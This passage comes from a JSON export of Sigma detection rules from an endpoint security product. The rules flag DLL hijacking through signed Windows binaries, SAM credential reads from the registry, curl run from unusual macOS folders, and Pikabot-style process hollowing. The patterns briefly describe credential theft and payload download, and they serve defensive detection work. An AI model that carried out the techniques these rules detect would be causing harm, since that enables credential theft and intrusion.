'?:\\Windows\\system32\\svchost.exe -k regsvc'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2d774838-fe3c-4704-a1c2-8e1287b6b0ee",
"rule_name": "SAM Database Read from Registry via Samdump",
"rule_description": "Detects a suspicious read operation on registry keys storing Windows account parameters.\nAdversaries may extract user information stored in SAM database to retrieve user's password hashes.\nIt is recommended to check whether the process accessing the registry keys has legitimate reasons to do it.\n",
"rule_creation_date": "2024-04-02",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1003.002",
"attack.t1012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2d93119f-c45c-4f21-b353-cd28185a6bcb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093883Z",
"creation_date": "2026-03-23T11:45:34.093885Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093889Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_quser.yml",
"content": "title: DLL Hijacking via quser.exe\nid: 2d93119f-c45c-4f21-b353-cd28185a6bcb\ndescription: |\n Detects potential Windows DLL Hijacking via quser.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'quser.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\UTILDLL.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2d93119f-c45c-4f21-b353-cd28185a6bcb",
"rule_name": "DLL Hijacking via quser.exe",
"rule_description": "Detects potential Windows DLL Hijacking via quser.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2da166af-7d44-4ca3-a8d3-3210b643d807",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618655Z",
"creation_date": "2026-03-23T11:45:34.618657Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618662Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_vmwarexferlogs.yml",
"content": "title: DLL Hijacking via VMwareXferlogs.exe\nid: 2da166af-7d44-4ca3-a8d3-3210b643d807\ndescription: |\n Detects potential Windows DLL Hijacking via VMwareXferlogs.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying the legitimate VMwareXferlogs executable to another location and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/08/02\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'xferlogs.exe'\n ProcessSignature: 'VMWare, Inc.'\n ImageLoaded|endswith: '\\glib-2.0.dll'\n\n filter_legitimate_image:\n Image|startswith: '?:\\Program Files\\VMware\\VMware Tools\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith: '?:\\Program Files\\VMware\\VMware Tools\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'VMware, Inc.'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2da166af-7d44-4ca3-a8d3-3210b643d807",
"rule_name": "DLL Hijacking via VMwareXferlogs.exe",
"rule_description": "Detects potential Windows DLL Hijacking via VMwareXferlogs.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying the legitimate VMwareXferlogs executable to another location and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-08-02",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2da5035b-dc02-4700-8b81-859d0243e461",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594519Z",
"creation_date": "2026-03-23T11:45:34.594522Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594529Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dmcfghost.yml",
"content": "title: DLL Hijacking via dmcfghost.exe\nid: 2da5035b-dc02-4700-8b81-859d0243e461\ndescription: |\n Detects potential Windows DLL Hijacking via dmcfghost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dmcfghost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DMCmnUtils.dll'\n - '\\DMPushProxy.dll'\n - '\\dmxmlhelputils.dll'\n - '\\dsclient.dll'\n - '\\iri.dll'\n - '\\omadmapi.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2da5035b-dc02-4700-8b81-859d0243e461",
"rule_name": "DLL Hijacking via dmcfghost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dmcfghost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2dd18b86-68a7-4c00-9cd0-36f3ad10d60e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617713Z",
"creation_date": "2026-03-23T11:45:34.617715Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617719Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1105_curl_susp_parent.yml",
"content": "title: Curl Executed in a Suspicious Execution Context\nid: 2dd18b86-68a7-4c00-9cd0-36f3ad10d60e\ndescription: |\n Detects the curl command being executed by a parent process located in an uncommon folder.\n Attackers may execute curl to download additional payloads.\n It is recommended to investigate files that were downloaded, and to analyze the process that executed the curl command to determine whether this action was legitimate.\nreferences:\n - https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2024/07/22\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.CommandAndControl\n - classification.macOS.Behavior.FileDownload\n - classification.macOS.Behavior.Exfiltration\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n Image|endswith: '/curl'\n\n selection_susp_ancestors:\n ProcessAncestors|contains:\n # folder\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n - '/Volumes/'\n\n filter_shell:\n ParentImage|endswith:\n - '/zsh'\n - '/sh'\n - '/bash'\n\n exclusion_adode:\n ProcessParentImage|endswith: '/AcroInstallAlert.app/Contents/MacOS/AcroInstallAlert'\n ProcessCommandLine|startswith: '/usr/bin/curl -H Cache-Control: no-cache https://acroipm2.adobe.com/'\n\n condition: selection and 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2dd18b86-68a7-4c00-9cd0-36f3ad10d60e",
"rule_name": "Curl Executed in a Suspicious Execution Context",
"rule_description": "Detects the curl command being executed by a parent process located in an uncommon folder.\nAttackers may execute curl to download additional payloads.\nIt is recommended to investigate files that were downloaded, and to analyze the process that executed the curl command to determine whether this action was legitimate.\n",
"rule_creation_date": "2024-07-22",
"rule_modified_date": "2025-04-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2de657e9-b90e-455c-921d-6dc97f347601",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618947Z",
"creation_date": "2026-03-23T11:45:34.618949Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618953Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_slui.yml",
"content": "title: DLL Hijacking via slui.exe\nid: 2de657e9-b90e-455c-921d-6dc97f347601\ndescription: |\n Detects potential Windows DLL Hijacking via slui.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'slui.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CLDAPI.dll'\n - '\\CRYPTBASE.DLL'\n - '\\edputil.dll'\n - '\\FLTLIB.DLL'\n - '\\iphlpapi.dll'\n - '\\ndfapi.dll'\n - '\\PROPSYS.dll'\n - '\\sppc.dll'\n - '\\wdi.dll'\n - '\\WINBRAND.dll'\n - '\\WTSAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n filter_docker:\n Image: '\\Device\\VhdHardDisk{????????-????-????-????-????????????}\\Windows\\System32\\slui.exe'\n ImageLoaded: '*\\windowsfilter\\\\*\\Files\\Windows\\System32\\\\*.dll'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2de657e9-b90e-455c-921d-6dc97f347601",
"rule_name": "DLL Hijacking via slui.exe",
"rule_description": "Detects potential Windows DLL Hijacking via slui.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2e0c666b-c55c-45ac-b889-dd35b1dd206c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080686Z",
"creation_date": "2026-03-23T11:45:34.080688Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080692Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mshta.yml",
"content": "title: DLL Hijacking via mshta.exe\nid: 2e0c666b-c55c-45ac-b889-dd35b1dd206c\ndescription: |\n Detects potential Windows DLL Hijacking via mshta.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mshta.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.DLL'\n - '\\netutils.dll'\n - '\\srpapi.dll'\n - '\\SspiCli.dll'\n - '\\WINHTTP.dll'\n - '\\wkscli.dll'\n - '\\WLDP.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2e0c666b-c55c-45ac-b889-dd35b1dd206c",
"rule_name": "DLL Hijacking via mshta.exe",
"rule_description": "Detects potential Windows DLL Hijacking via mshta.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2e473606-203c-47b8-8899-647af707c98a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080012Z",
"creation_date": "2026-03-23T11:45:34.080014Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080018Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pikabot",
"https://www.zscaler.fr/blogs/security-research/technical-analysis-pikabot",
"https://research.openanalysis.net/pikabot/debugging/string%20decryption/2023/11/12/new-pikabot.html",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_suspicious_searchprotocolhost_execution.yml",
"content": "title: Suspicious SearchProtocolHost.exe Execution\nid: 2e473606-203c-47b8-8899-647af707c98a\ndescription: |\n Detects the suspicious execution of the legitimate SearchProtocolHost.exe Windows binary without legitimate command-line arguments.\n This technique has been used by the Pikabot malware, which starts SearchProtocolHost as a host for its payload, injected via process hollowing.\n Attackers can use process hollowing to inject malicious code into legitimate processes, allowing them to evade detection and execute harmful activities on a compromised system.\n It is recommended to analyze actions taken by SearchProtocolHost as well as to look for other suspicious actions performed by the parent process.\nreferences:\n - https://malpedia.caad.fkie.fraunhofer.de/details/win.pikabot\n - https://www.zscaler.fr/blogs/security-research/technical-analysis-pikabot\n - https://research.openanalysis.net/pikabot/debugging/string%20decryption/2023/11/12/new-pikabot.html\n - https://attack.mitre.org/techniques/T1055/\ndate: 2023/11/20\nmodified: 2025/09/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.ProcessTampering\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'SearchProtocolHost.exe'\n ProcessParentImage|contains: '?'\n\n filter_commandline:\n CommandLine|contains: ' Global\\'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2e473606-203c-47b8-8899-647af707c98a",
"rule_name": "Suspicious SearchProtocolHost.exe Execution",
"rule_description": "Detects the suspicious execution of the legitimate SearchProtocolHost.exe Windows binary without legitimate command-line arguments.\nThis technique has been used by the Pikabot malware, which starts SearchProtocolHost as a host for its payload, injected via process hollowing.\nAttackers can use process hollowing to inject malicious code into legitimate processes, allowing them to evade detection and execute harmful activities on a compromised system.\nIt is recommended to analyze actions taken by SearchProtocolHost as well as to look for other suspicious actions performed by the parent process.\n",
"rule_creation_date": "2023-11-20",
"rule_modified_date": "2025-09-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2e58af7c-54b9-470d-b64b-f3731c941837",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594471Z",
"creation_date": "2026-03-23T11:45:34.594474Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594482Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
